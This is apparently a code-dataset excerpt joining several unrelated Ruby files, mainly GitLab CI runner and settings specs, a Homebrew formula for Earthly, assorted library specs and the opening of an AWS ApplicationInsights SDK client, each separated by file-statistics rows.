context 'when content-range start is too small' do
let(:headers_with_range) { headers.merge({ 'Content-Range' => '8-20/13' }) }
it 'gets 416 error response with range headers' do
expect(response.status).to eq 416
expect(response.header).to have_key 'Range'
expect(response.header['Range']).to eq '0-11'
end
end
context 'when Content-Range header is missing' do
let(:headers_with_range) { headers }
it { expect(response.status).to eq 400 }
end
context 'when job has been errased' do
let(:job) { create(:ci_build, runner_id: runner.id, erased_at: Time.now) }
it { expect(response.status).to eq 403 }
end
def patch_the_trace(content = ' appended', request_headers = nil)
unless request_headers
job.trace.read do |stream|
offset = stream.size
limit = offset + content.length - 1
request_headers = headers.merge({ 'Content-Range' => "#{offset}-#{limit}" })
end
end
Timecop.travel(job.updated_at + update_interval) do
patch api("/jobs/#{job.id}/trace"), content, request_headers
job.reload
end
end
def initial_patch_the_trace
patch_the_trace(' appended', headers_with_range)
end
def force_patch_the_trace
2.times { patch_the_trace('') }
end
end
describe 'artifacts' do
let(:job) { create(:ci_build, :pending, pipeline: pipeline, runner_id: runner.id) }
let(:jwt_token) { JWT.encode({ 'iss' => 'gitlab-workhorse' }, Gitlab::Workhorse.secret, 'HS256') }
let(:headers) { { 'GitLab-Workhorse' => '1.0', Gitlab::Workhorse::INTERNAL_API_REQUEST_HEADER => jwt_token } }
let(:headers_with_token) { headers.merge(API::Helpers::Runner::JOB_TOKEN_HEADER => job.token) }
let(:file_upload) { fixture_file_upload('spec/fixtures/banana_sample.gif', 'image/gif') }
let(:file_upload2) { fixture_file_upload('spec/fixtures/dk.png', 'image/gif') }
before do
stub_artifacts_object_storage
job.run!
end
describe 'POST /api/v4/jobs/:id/artifacts/authorize' do
context 'when using token as parameter' do
context 'posting artifacts to running job' do
subject do
authorize_artifacts_with_token_in_params
end
shared_examples 'authorizes local file' do
it 'succeeds' do
subject
expect(response).to have_gitlab_http_status(200)
expect(response.content_type.to_s).to eq(Gitlab::Workhorse::INTERNAL_API_CONTENT_TYPE)
expect(json_response['TempPath']).to eq(JobArtifactUploader.workhorse_local_upload_path)
expect(json_response['RemoteObject']).to be_nil
end
end
context 'when using local storage' do
it_behaves_like 'authorizes local file'
end
context 'when using remote storage' do
context 'when direct upload is enabled' do
before do
stub_artifacts_object_storage(enabled: true, direct_upload: true)
end
it 'succeeds' do
subject
expect(response).to have_gitlab_http_status(200)
expect(response.content_type.to_s).to eq(Gitlab::Workhorse::INTERNAL_API_CONTENT_TYPE)
expect(json_response['TempPath']).to eq(JobArtifactUploader.workhorse_local_upload_path)
expect(json_response['RemoteObject']).to have_key('ID')
expect(json_response['RemoteObject']).to have_key('GetURL')
expect(json_response['RemoteObject']).to have_key('StoreURL')
expect(json_response['RemoteObject']).to have_key('DeleteURL')
expect(json_response['RemoteObject']).to have_key('MultipartUpload')
end
end
context 'when direct upload is disabled' do
before do
stub_artifacts_object_storage(enabled: true, direct_upload: false)
end
it_behaves_like 'authorizes local file'
end
end
end
it 'fails to post too large artifact' do
stub_application_setting(max_artifacts_size: 0)
authorize_artifacts_with_token_in_params(filesize: 100)
expect(response).to have_gitlab_http_status(413)
end
end
context 'when using token as header' do
it 'authorizes posting artifacts to running job' do
authorize_artifacts_with_token_in_headers
expect(response).to have_gitlab_http_status(200)
expect(response.content_type.to_s).to eq(Gitlab::Workhorse::INTERNAL_API_CONTENT_TYPE)
expect(json_response['TempPath']).not_to be_nil
end
it 'fails to post too large artifact' do
stub_application_setting(max_artifacts_size: 0)
authorize_artifacts_with_token_in_headers(filesize: 100)
expect(response).to have_gitlab_http_status(413)
end
end
context 'when using runners token' do
it 'fails to authorize artifacts posting' do
authorize_artifacts(token: job.project.runners_token)
expect(response).to have_gitlab_http_status(403)
end
end
it 'reject requests that did not go through gitlab-workhorse' do
headers.delete(Gitlab::Workhorse::INTERNAL_API_REQUEST_HEADER)
authorize_artifacts
expect(response).to have_gitlab_http_status(500)
end
context 'authorization token is invalid' do
it 'responds with forbidden' do
authorize_artifacts(token: 'invalid', filesize: 100 )
expect(response).to have_gitlab_http_status(403)
end
end
def authorize_artifacts(params = {}, request_headers = headers)
post api("/jobs/#{job.id}/artifacts/authorize"), params, request_headers
end
def authorize_artifacts_with_token_in_params(params = {}, request_headers = headers)
params = params.merge(token: job.token)
authorize_artifacts(params, request_headers)
end
def authorize_artifacts_with_token_in_headers(params = {}, request_headers = headers_with_token)
authorize_artifacts(params, request_headers)
end
end
describe 'POST /api/v4/jobs/:id/artifacts' do
context 'when artifacts are being stored inside of tmp path' do
before do
# by configuring this path we allow to pass temp file from any path
allow(JobArtifactUploader).to receive(:workhorse_upload_path).and_return('/')
end
context 'when job has been erased' do
let(:job) { create(:ci_build, erased_at: Time.now) }
before do
upload_artifacts(file_upload, headers_with_token)
end
it 'responds with forbidden' do
upload_artifacts(file_upload, headers_with_token)
expect(response).to have_gitlab_http_status(403)
end
end
context 'when job is running' do
shared_examples 'successful artifacts upload' do
it 'updates successfully' do
expect(response).to have_gitlab_http_status(201)
end
end
context 'when uses accelerated file post' do
context 'for file stored locally' do
before do
upload_artifacts(file_upload, headers_with_token)
end
it_behaves_like 'successful artifacts upload'
end
context 'for file stored remotelly' do
let!(:fog_connection) do
stub_artifacts_object_storage(direct_upload: true)
end
before do
fog_connection.directories.get('artifacts').files.create(
key: 'tmp/uploads/12312300',
body: 'content'
)
upload_artifacts(file_upload, headers_with_token,
{ 'file.remote_id' => remote_id })
end
context 'when valid remote_id is used' do
let(:remote_id) { '12312300' }
it_behaves_like 'successful artifacts upload'
end
context 'when invalid remote_id is used' do
let(:remote_id) { 'invalid id' }
it 'responds with bad request' do
expect(response).to have_gitlab_http_status(500)
expect(json_response['message']).to eq("Missing file")
end
end
end
end
context 'when using runners token' do
it 'responds with forbidden' do
upload_artifacts(file_upload, headers.merge(API::Helpers::Runner::JOB_TOKEN_HEADER => job.project.runners_token))
expect(response).to have_gitlab_http_status(403)
end
end
end
context 'when artifacts file is too large' do
it 'fails to post too large artifact' do
stub_application_setting(max_artifacts_size: 0)
upload_artifacts(file_upload, headers_with_token)
expect(response).to have_gitlab_http_status(413)
end
end
context 'when artifacts post request does not contain file' do
it 'fails to post artifacts without file' do
post api("/jobs/#{job.id}/artifacts"), {}, headers_with_token
expect(response).to have_gitlab_http_status(400)
end
end
context 'GitLab Workhorse is not configured' do
it 'fails to post artifacts without GitLab-Workhorse' do
post api("/jobs/#{job.id}/artifacts"), { token: job.token }, {}
expect(response).to have_gitlab_http_status(403)
end
end
context 'when setting an expire date' do
let(:default_artifacts_expire_in) {}
let(:post_data) do
{ 'file.path' => file_upload.path,
'file.name' => file_upload.original_filename,
'expire_in' => expire_in }
end
before do
stub_application_setting(default_artifacts_expire_in: default_artifacts_expire_in)
post(api("/jobs/#{job.id}/artifacts"), post_data, headers_with_token)
end
context 'when an expire_in is given' do
let(:expire_in) { '7 days' }
it 'updates when specified' do
expect(response).to have_gitlab_http_status(201)
expect(job.reload.artifacts_expire_at).to be_within(5.minutes).of(7.days.from_now)
end
end
context 'when no expire_in is given' do
let(:expire_in) { nil }
it 'ignores if not specified' do
expect(response).to have_gitlab_http_status(201)
expect(job.reload.artifacts_expire_at).to be_nil
end
context 'with application default' do
context 'when default is 5 days' do
let(:default_artifacts_expire_in) { '5 days' }
it 'sets to application default' do
expect(response).to have_gitlab_http_status(201)
expect(job.reload.artifacts_expire_at).to be_within(5.minutes).of(5.days.from_now)
end
end
context 'when default is 0' do
let(:default_artifacts_expire_in) { '0' }
it 'does not set expire_in' do
expect(response).to have_gitlab_http_status(201)
expect(job.reload.artifacts_expire_at).to be_nil
end
end
end
end
end
context 'posts artifacts file and metadata file' do
let!(:artifacts) { file_upload }
let!(:artifacts_sha256) { Digest::SHA256.file(artifacts.path).hexdigest }
let!(:metadata) { file_upload2 }
let!(:metadata_sha256) { Digest::SHA256.file(metadata.path).hexdigest }
let(:stored_artifacts_file) { job.reload.artifacts_file.file }
let(:stored_metadata_file) { job.reload.artifacts_metadata.file }
let(:stored_artifacts_size) { job.reload.artifacts_size }
let(:stored_artifacts_sha256) { job.reload.job_artifacts_archive.file_sha256 }
let(:stored_metadata_sha256) { job.reload.job_artifacts_metadata.file_sha256 }
before do
post(api("/jobs/#{job.id}/artifacts"), post_data, headers_with_token)
end
context 'when posts data accelerated by workhorse is correct' do
let(:post_data) do
{ 'file.path' => artifacts.path,
'file.name' => artifacts.original_filename,
'file.sha256' => artifacts_sha256,
'metadata.path' => metadata.path,
'metadata.name' => metadata.original_filename,
'metadata.sha256' => metadata_sha256 }
end
it 'stores artifacts and artifacts metadata' do
expect(response).to have_gitlab_http_status(201)
expect(stored_artifacts_file.original_filename).to eq(artifacts.original_filename)
expect(stored_metadata_file.original_filename).to eq(metadata.original_filename)
expect(stored_artifacts_size).to eq(72821)
expect(stored_artifacts_sha256).to eq(artifacts_sha256)
expect(stored_metadata_sha256).to eq(metadata_sha256)
end
end
context 'when there is no artifacts file in post data' do
let(:post_data) do
{ 'metadata' => metadata }
end
it 'is expected to respond with bad request' do
expect(response).to have_gitlab_http_status(400)
end
it 'does not store metadata' do
expect(stored_metadata_file).to be_nil
end
end
end
end
context 'when artifacts are being stored outside of tmp path' do
let(:new_tmpdir) { Dir.mktmpdir }
before do
# init before overwriting tmp dir
file_upload
# by configuring this path we allow to pass file from @tmpdir only
# but all temporary files are stored in system tmp directory
allow(Dir).to receive(:tmpdir).and_return(new_tmpdir)
end
after do
FileUtils.remove_entry(new_tmpdir)
end
it' "fails to post artifacts for outside of tmp path"' do
upload_artifacts(file_upload, headers_with_token)
expect(response).to have_gitlab_http_status(400)
end
end
def upload_artifacts(file, headers = {}, params = {})
params = params.merge({
'file.path' => file.path,
'file.name' => file.original_filename
})
post api("/jobs/#{job.id}/artifacts"), params, headers
end
end
describe 'GET /api/v4/jobs/:id/artifacts' do
let(:token) { job.token }
context 'when job has artifacts' do
let(:job) { create(:ci_build) }
let(:store) { JobArtifactUploader::Store::LOCAL }
before do
create(:ci_job_artifact, :archive, file_store: store, job: job)
end
context 'when using job token' do
context 'when artifacts are stored locally' do
let(:download_headers) do
{ 'Content-Transfer-Encoding' => 'binary',
'Content-Disposition' => 'attachment; filename=ci_build_artifacts.zip' }
end
before do
download_artifact
end
it 'download artifacts' do
expect(response).to have_http_status(200)
expect(response.headers.to_h).to include download_headers
end
end
context 'when artifacts are stored remotely' do
let(:store) { JobArtifactUploader::Store::REMOTE }
let!(:job) { create(:ci_build) }
context 'when proxy download is being used' do
before do
download_artifact(direct_download: false)
end
it 'uses workhorse send-url' do
expect(response).to have_gitlab_http_status(200)
expect(response.headers.to_h).to include(
'Gitlab-Workhorse-Send-Data' => /send-url:/)
end
end
context 'when direct download is being used' do
before do
download_artifact(direct_download: true)
end
it 'receive redirect for downloading artifacts' do
expect(response).to have_gitlab_http_status(302)
expect(response.headers).to include('Location')
end
end
end
end
context 'when using runnners token' do
let(:token) { job.project.runners_token }
before do
download_artifact
end
it 'responds with forbidden' do
expect(response).to have_gitlab_http_status(403)
end
end
end
context 'when job does not has artifacts' do
it 'responds with not found' do
download_artifact
expect(response).to have_gitlab_http_status(404)
end
end
def download_artifact(params = {}, request_headers = headers)
params = params.merge(token: token)
job.reload
get api("/jobs/#{job.id}/artifacts"), params, request_headers
end
end
end
end
end
| 35.398448 | 129 | 0.565874 |
ac09e7da9255dfb71210eaf4b6274002afa893e3 | 705 | require 'spec_helper'
describe Smtp2go::Smtp2goBaseException do
it { expect(described_class).to be Smtp2go::Smtp2goBaseException }
end
describe Smtp2go::Smtp2goAPIKeyException do
it { expect(described_class).to be < Smtp2go::Smtp2goBaseException }
it "raises a salient exception message" do
exception = described_class.new
expect(exception.message).to include(
'SMTP2GO_API_KEY', 'Environment Variable')
end
end
describe Smtp2go::Smtp2goParameterException do
it { expect(described_class).to be < Smtp2go::Smtp2goBaseException }
it "raises a salient exception message" do
exception = described_class.new
expect(exception.message).to include('html', 'text')
end
end
| 28.2 | 70 | 0.764539 |
870c3093ac5dba6e62cf5582547473dfd65256ca | 397 | dir = Pathname(__FILE__).dirname.expand_path / 'types'
require dir / 'boolean'
require dir / 'discriminator'
require dir / 'text'
require dir / 'paranoid_datetime'
require dir / 'paranoid_boolean'
require dir / 'object'
require dir / 'serial'
unless defined?(DM)
DM = DataMapper::Types
end
module DataMapper
module Resource
include Types
end # module Resource
end # module DataMapper
| 19.85 | 54 | 0.740554 |
e88de652373157c6be597c03c2634185d58c39a8 | 2,081 | class Earthly < Formula
desc "Build automation tool for the container era"
homepage "https://earthly.dev/"
url "https://github.com/earthly/earthly/archive/v0.5.17.tar.gz"
sha256 "1dcc56b419413480fa2e116606cab2c8003483e0b8052443aa7b7da0572ce47f"
license "BUSL-1.1"
head "https://github.com/earthly/earthly.git"
livecheck do
url :stable
strategy :github_latest
end
bottle do
sha256 cellar: :any_skip_relocation, arm64_big_sur: "6ced4b644da7733596ddb225d4d07dddcdf3cea9975a1dcdce724e65093142fb"
sha256 cellar: :any_skip_relocation, big_sur: "45b1406d85fbc167590873e727dd63624ed17bceadc289bb4c6c7f8e8a669317"
sha256 cellar: :any_skip_relocation, catalina: "16c593502fd9a7270edab13a2ed8c9ca44486eb90bc97dceef99ec8c092ddadf"
sha256 cellar: :any_skip_relocation, mojave: "a9a09599ccebca0c987ea802cfc861097055ab2662db97c417bfeb83756fdb90"
sha256 cellar: :any_skip_relocation, x86_64_linux: "e3b8af702a1afbb4ec9e795dc1f7f51421938a57378488764463b279cb26afb3" # linuxbrew-core
end
disable! date: "2021-07-15", because: "has an incompatible license"
depends_on "go" => :build
def install
ldflags = "-X main.DefaultBuildkitdImage=earthly/buildkitd:v#{version} -X main.Version=v#{version} " \
"-X main.GitSha=bdeda2542465cb0bc0c8985a905aa2e3579a3f7b "
tags = "dfrunmount dfrunsecurity dfsecrets dfssh dfrunnetwork"
system "go", "build",
"-tags", tags,
"-ldflags", ldflags,
*std_go_args,
"./cmd/earthly/main.go"
bash_output = Utils.safe_popen_read("#{bin}/earthly", "bootstrap", "--source", "bash")
(bash_completion/"earthly").write bash_output
zsh_output = Utils.safe_popen_read("#{bin}/earthly", "bootstrap", "--source", "zsh")
(zsh_completion/"_earthly").write zsh_output
end
test do
(testpath/"build.earthly").write <<~EOS
default:
\tRUN echo Homebrew
EOS
output = shell_output("#{bin}/earthly --buildkit-host 127.0.0.1 +default 2>&1", 6).strip
assert_match "buildkitd failed to start", output
end
end
| 39.264151 | 139 | 0.730899 |
ac064157ed461ce5b3111467e1e88929b9e6c24b | 2,314 | =begin
#TransferZero API
#Reference documentation for the TransferZero API V1
OpenAPI spec version: 1.0
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 4.0.0-beta3
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for TransferZero::PoliticallyExposedPerson
# Automatically generated by openapi-generator (https://openapi-generator.tech)
# Please update as you see appropriate
describe 'PoliticallyExposedPerson' do
before do
# run before each test
@instance = TransferZero::PoliticallyExposedPerson.new
end
after do
# run after each test
end
describe 'test an instance of PoliticallyExposedPerson' do
it 'should create an instance of PoliticallyExposedPerson' do
expect(@instance).to be_instance_of(TransferZero::PoliticallyExposedPerson)
end
end
describe 'test attribute "id"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "name"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "position"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "started_date"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "ended_date"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "sender_id"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "created_at"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "updated_at"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 27.547619 | 102 | 0.724287 |
035d50c960935fb8f7bef09380b31693e780bd4a | 1,376 | require_relative 'spec_helper'
describe 'openstack-network::plugin_config' do
describe 'ubuntu' do
let(:runner) { ChefSpec::SoloRunner.new(UBUNTU_OPTS) }
let(:node) { runner.node }
cached(:chef_run) do
node.override['openstack']['network']['plugins']['ml2'].tap do |ml2|
ml2['path'] = '/etc/neutron/more_plugins'
ml2['filename'] = 'ml2_conf.ini'
ml2['conf'].tap do |conf|
conf['section']['key'] = 'value'
end
end
node.override['openstack']['network']['plugins']['openvswitch'].tap do |ovs|
ovs['path'] = '/etc/neutron/plugins/'
ovs['filename'] = 'openvswitch_conf.ini'
ovs['conf'].tap do |conf|
conf['section']['key'] = 'value'
end
end
runner.converge(described_recipe)
end
%w(/etc/neutron/more_plugins /etc/neutron/plugins/).each do |dir|
it do
expect(chef_run).to create_directory(dir)
.with(
recursive: true,
owner: 'neutron',
group: 'neutron',
mode: '700'
)
end
%w(ml2_conf.ini openvswitch_conf.ini).each do |conf|
let(:file) { chef_run.template(File.join(dir, conf)) }
it do
expect(chef_run).to render_config_file(file.name).with_section_content('section', 'key = value')
end
end
end
end
end
| 30.577778 | 106 | 0.574128 |
d50f1aa1dd8bb3c8e0acf919b829cf12547fb6af | 10,772 | # frozen_string_literal: true
require('spec_helper')
RSpec.describe Projects::Settings::CiCdController do
let_it_be(:user) { create(:user) }
let_it_be(:project_auto_devops) { create(:project_auto_devops) }
let(:project) { project_auto_devops.project }
before do
project.add_maintainer(user)
sign_in(user)
end
describe 'GET show' do
let_it_be(:parent_group) { create(:group) }
let_it_be(:group) { create(:group, parent: parent_group) }
let_it_be(:other_project) { create(:project, group: group) }
it 'renders show with 200 status code' do
get :show, params: { namespace_id: project.namespace, project_id: project }
expect(response).to have_gitlab_http_status(:ok)
expect(response).to render_template(:show)
end
context 'with CI/CD disabled' do
before do
project.project_feature.update_attribute(:builds_access_level, ProjectFeature::DISABLED)
end
it 'renders show with 404 status code' do
get :show, params: { namespace_id: project.namespace, project_id: project }
expect(response).to have_gitlab_http_status(:not_found)
end
end
context 'with group runners' do
let_it_be(:group_runner) { create(:ci_runner, :group, groups: [group]) }
let_it_be(:project_runner) { create(:ci_runner, :project, projects: [other_project]) }
let_it_be(:shared_runner) { create(:ci_runner, :instance) }
it 'sets assignable project runners only' do
group.add_maintainer(user)
get :show, params: { namespace_id: project.namespace, project_id: project }
expect(assigns(:assignable_runners)).to contain_exactly(project_runner)
end
end
context 'prevents N+1 queries for tags' do
render_views
def show
get :show, params: { namespace_id: project.namespace, project_id: project }
end
it 'has the same number of queries with one tag or with many tags', :request_store do
group.add_maintainer(user)
show # warmup
# with one tag
create(:ci_runner, :instance, tag_list: %w(shared_runner))
create(:ci_runner, :project, projects: [other_project], tag_list: %w(project_runner))
create(:ci_runner, :group, groups: [group], tag_list: %w(group_runner))
control = ActiveRecord::QueryRecorder.new { show }
# with several tags
create(:ci_runner, :instance, tag_list: %w(shared_runner tag2 tag3))
create(:ci_runner, :project, projects: [other_project], tag_list: %w(project_runner tag2 tag3))
create(:ci_runner, :group, groups: [group], tag_list: %w(group_runner tag2 tag3))
expect { show }.not_to exceed_query_limit(control)
end
end
end
describe '#reset_cache' do
before do
sign_in(user)
project.add_maintainer(user)
allow(ResetProjectCacheService).to receive_message_chain(:new, :execute).and_return(true)
end
subject { post :reset_cache, params: { namespace_id: project.namespace, project_id: project }, format: :json }
it 'calls reset project cache service' do
expect(ResetProjectCacheService).to receive_message_chain(:new, :execute)
subject
end
context 'when service returns successfully' do
it 'returns a success header' do
subject
expect(response).to have_gitlab_http_status(:ok)
end
end
context 'when service does not return successfully' do
before do
allow(ResetProjectCacheService).to receive_message_chain(:new, :execute).and_return(false)
end
it 'returns an error header' do
subject
expect(response).to have_gitlab_http_status(:bad_request)
end
end
end
describe 'PUT #reset_registration_token' do
subject { put :reset_registration_token, params: { namespace_id: project.namespace, project_id: project } }
it 'resets runner registration token' do
expect { subject }.to change { project.reload.runners_token }
expect(flash[:toast]).to eq('New runners registration token has been generated!')
end
it 'redirects the user to admin runners page' do
subject
expect(response).to redirect_to(namespace_project_settings_ci_cd_path)
end
end
describe 'PATCH update' do
let(:params) { { ci_config_path: '' } }
subject do
patch :update,
params: {
namespace_id: project.namespace.to_param,
project_id: project,
project: params
}
end
it 'redirects to the settings page' do
subject
expect(response).to have_gitlab_http_status(:found)
expect(flash[:toast]).to eq("Pipelines settings for '#{project.name}' were successfully updated.")
end
context 'when updating the auto_devops settings' do
let(:params) { { auto_devops_attributes: { enabled: '' } } }
context 'following the instance default' do
let(:params) { { auto_devops_attributes: { enabled: '' } } }
it 'allows enabled to be set to nil' do
subject
project_auto_devops.reload
expect(project_auto_devops.enabled).to be_nil
end
end
context 'when run_auto_devops_pipeline is true' do
before do
expect_next_instance_of(Projects::UpdateService) do |instance|
expect(instance).to receive(:run_auto_devops_pipeline?).and_return(true)
end
end
context 'when the project repository is empty' do
it 'sets a notice flash' do
subject
expect(controller).to set_flash[:notice]
end
it 'does not queue a CreatePipelineWorker' do
expect(CreatePipelineWorker).not_to receive(:perform_async).with(project.id, user.id, project.default_branch, :web, any_args)
subject
end
end
context 'when the project repository is not empty' do
let(:project) { create(:project, :repository) }
it 'displays a toast message' do
allow(CreatePipelineWorker).to receive(:perform_async).with(project.id, user.id, project.default_branch, :web, any_args)
subject
expect(controller).to set_flash[:toast]
end
it 'queues a CreatePipelineWorker' do
expect(CreatePipelineWorker).to receive(:perform_async).with(project.id, user.id, project.default_branch, :web, any_args)
subject
end
it 'creates a pipeline', :sidekiq_inline do
project.repository.create_file(user, 'Gemfile', 'Gemfile contents',
message: 'Add Gemfile',
branch_name: 'master')
expect { subject }.to change { Ci::Pipeline.count }.by(1)
end
end
end
context 'when run_auto_devops_pipeline is not true' do
before do
expect_next_instance_of(Projects::UpdateService) do |instance|
expect(instance).to receive(:run_auto_devops_pipeline?).and_return(false)
end
end
it 'does not queue a CreatePipelineWorker' do
expect(CreatePipelineWorker).not_to receive(:perform_async).with(project.id, user.id, :web, any_args)
subject
end
end
end
context 'when updating general settings' do
context 'when build_timeout_human_readable is not specified' do
let(:params) { { build_timeout_human_readable: '' } }
it 'set default timeout' do
subject
project.reload
expect(project.build_timeout).to eq(3600)
end
end
context 'when build_timeout_human_readable is specified' do
let(:params) { { build_timeout_human_readable: '1h 30m' } }
it 'set specified timeout' do
subject
project.reload
expect(project.build_timeout).to eq(5400)
end
end
context 'when build_timeout_human_readable is invalid' do
let(:params) { { build_timeout_human_readable: '5m' } }
it 'set specified timeout' do
subject
expect(controller).to set_flash[:alert]
expect(response).to redirect_to(namespace_project_settings_ci_cd_path)
end
end
context 'when default_git_depth is not specified' do
let(:params) { { ci_cd_settings_attributes: { default_git_depth: 10 } } }
before do
project.ci_cd_settings.update!(default_git_depth: nil)
end
it 'set specified git depth' do
subject
project.reload
expect(project.ci_default_git_depth).to eq(10)
end
end
context 'when forward_deployment_enabled is not specified' do
let(:params) { { ci_cd_settings_attributes: { forward_deployment_enabled: false } } }
before do
project.ci_cd_settings.update!(forward_deployment_enabled: nil)
end
it 'sets forward deployment enabled' do
subject
project.reload
expect(project.ci_forward_deployment_enabled).to eq(false)
end
end
context 'when max_artifacts_size is specified' do
let(:params) { { max_artifacts_size: 10 } }
context 'and user is not an admin' do
it 'does not set max_artifacts_size' do
subject
project.reload
expect(project.max_artifacts_size).to be_nil
end
end
context 'and user is an admin' do
let(:user) { create(:admin) }
context 'with admin mode disabled' do
it 'does not set max_artifacts_size' do
subject
project.reload
expect(project.max_artifacts_size).to be_nil
end
end
context 'with admin mode enabled', :enable_admin_mode do
it 'sets max_artifacts_size' do
subject
project.reload
expect(project.max_artifacts_size).to eq(10)
end
end
end
end
end
end
describe 'GET #runner_setup_scripts' do
it 'renders the setup scripts' do
get :runner_setup_scripts, params: { os: 'linux', arch: 'amd64', namespace_id: project.namespace, project_id: project }
expect(response).to have_gitlab_http_status(:ok)
expect(json_response).to have_key("install")
expect(json_response).to have_key("register")
end
it 'renders errors if they occur' do
get :runner_setup_scripts, params: { os: 'foo', arch: 'bar', namespace_id: project.namespace, project_id: project }
expect(response).to have_gitlab_http_status(:bad_request)
expect(json_response).to have_key("errors")
end
end
end
| 30.954023 | 137 | 0.640457 |
01d51502da244599ffe03755c0bcf2b51948657b | 515 | # frozen_string_literal: true
module GraphqlDevise
module Mutations
class Logout < Base
def resolve
if current_resource && client && current_resource.tokens[client]
current_resource.tokens.delete(client)
current_resource.save!
remove_resource
yield current_resource if block_given?
{ authenticatable: current_resource }
else
raise_user_error(I18n.t('graphql_devise.user_not_found'))
end
end
end
end
end
| 22.391304 | 72 | 0.656311 |
626e58f87c1fb8da36f47990766aea93718867f3 | 77,324 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
require 'seahorse/client/plugins/content_length.rb'
require 'aws-sdk-core/plugins/credentials_configuration.rb'
require 'aws-sdk-core/plugins/logging.rb'
require 'aws-sdk-core/plugins/param_converter.rb'
require 'aws-sdk-core/plugins/param_validator.rb'
require 'aws-sdk-core/plugins/user_agent.rb'
require 'aws-sdk-core/plugins/helpful_socket_errors.rb'
require 'aws-sdk-core/plugins/retry_errors.rb'
require 'aws-sdk-core/plugins/global_configuration.rb'
require 'aws-sdk-core/plugins/regional_endpoint.rb'
require 'aws-sdk-core/plugins/endpoint_discovery.rb'
require 'aws-sdk-core/plugins/endpoint_pattern.rb'
require 'aws-sdk-core/plugins/response_paging.rb'
require 'aws-sdk-core/plugins/stub_responses.rb'
require 'aws-sdk-core/plugins/idempotency_token.rb'
require 'aws-sdk-core/plugins/jsonvalue_converter.rb'
require 'aws-sdk-core/plugins/client_metrics_plugin.rb'
require 'aws-sdk-core/plugins/client_metrics_send_plugin.rb'
require 'aws-sdk-core/plugins/transfer_encoding.rb'
require 'aws-sdk-core/plugins/http_checksum.rb'
require 'aws-sdk-core/plugins/checksum_algorithm.rb'
require 'aws-sdk-core/plugins/defaults_mode.rb'
require 'aws-sdk-core/plugins/recursion_detection.rb'
require 'aws-sdk-core/plugins/signature_v4.rb'
require 'aws-sdk-core/plugins/protocols/json_rpc.rb'
Aws::Plugins::GlobalConfiguration.add_identifier(:applicationinsights)
module Aws::ApplicationInsights
# An API client for ApplicationInsights. To construct a client, you need to configure a `:region` and `:credentials`.
#
# client = Aws::ApplicationInsights::Client.new(
# region: region_name,
# credentials: credentials,
# # ...
# )
#
# For details on configuring region and credentials see
# the [developer guide](/sdk-for-ruby/v3/developer-guide/setup-config.html).
#
# See {#initialize} for a full list of supported configuration options.
class Client < Seahorse::Client::Base
include Aws::ClientStubs
@identifier = :applicationinsights
set_api(ClientApi::API)
add_plugin(Seahorse::Client::Plugins::ContentLength)
add_plugin(Aws::Plugins::CredentialsConfiguration)
add_plugin(Aws::Plugins::Logging)
add_plugin(Aws::Plugins::ParamConverter)
add_plugin(Aws::Plugins::ParamValidator)
add_plugin(Aws::Plugins::UserAgent)
add_plugin(Aws::Plugins::HelpfulSocketErrors)
add_plugin(Aws::Plugins::RetryErrors)
add_plugin(Aws::Plugins::GlobalConfiguration)
add_plugin(Aws::Plugins::RegionalEndpoint)
add_plugin(Aws::Plugins::EndpointDiscovery)
add_plugin(Aws::Plugins::EndpointPattern)
add_plugin(Aws::Plugins::ResponsePaging)
add_plugin(Aws::Plugins::StubResponses)
add_plugin(Aws::Plugins::IdempotencyToken)
add_plugin(Aws::Plugins::JsonvalueConverter)
add_plugin(Aws::Plugins::ClientMetricsPlugin)
add_plugin(Aws::Plugins::ClientMetricsSendPlugin)
add_plugin(Aws::Plugins::TransferEncoding)
add_plugin(Aws::Plugins::HttpChecksum)
add_plugin(Aws::Plugins::ChecksumAlgorithm)
add_plugin(Aws::Plugins::DefaultsMode)
add_plugin(Aws::Plugins::RecursionDetection)
add_plugin(Aws::Plugins::SignatureV4)
add_plugin(Aws::Plugins::Protocols::JsonRpc)
# @overload initialize(options)
# @param [Hash] options
# @option options [required, Aws::CredentialProvider] :credentials
# Your AWS credentials. This can be an instance of any one of the
# following classes:
#
# * `Aws::Credentials` - Used for configuring static, non-refreshing
# credentials.
#
# * `Aws::SharedCredentials` - Used for loading static credentials from a
# shared file, such as `~/.aws/config`.
#
# * `Aws::AssumeRoleCredentials` - Used when you need to assume a role.
#
# * `Aws::AssumeRoleWebIdentityCredentials` - Used when you need to
# assume a role after providing credentials via the web.
#
# * `Aws::SSOCredentials` - Used for loading credentials from AWS SSO using an
# access token generated from `aws login`.
#
# * `Aws::ProcessCredentials` - Used for loading credentials from a
# process that outputs to stdout.
#
# * `Aws::InstanceProfileCredentials` - Used for loading credentials
# from an EC2 IMDS on an EC2 instance.
#
# * `Aws::ECSCredentials` - Used for loading credentials from
# instances running in ECS.
#
# * `Aws::CognitoIdentityCredentials` - Used for loading credentials
# from the Cognito Identity service.
#
# When `:credentials` are not configured directly, the following
# locations will be searched for credentials:
#
# * `Aws.config[:credentials]`
# * The `:access_key_id`, `:secret_access_key`, and `:session_token` options.
# * ENV['AWS_ACCESS_KEY_ID'], ENV['AWS_SECRET_ACCESS_KEY']
# * `~/.aws/credentials`
# * `~/.aws/config`
# * EC2/ECS IMDS instance profile - When used by default, the timeouts
# are very aggressive. Construct and pass an instance of
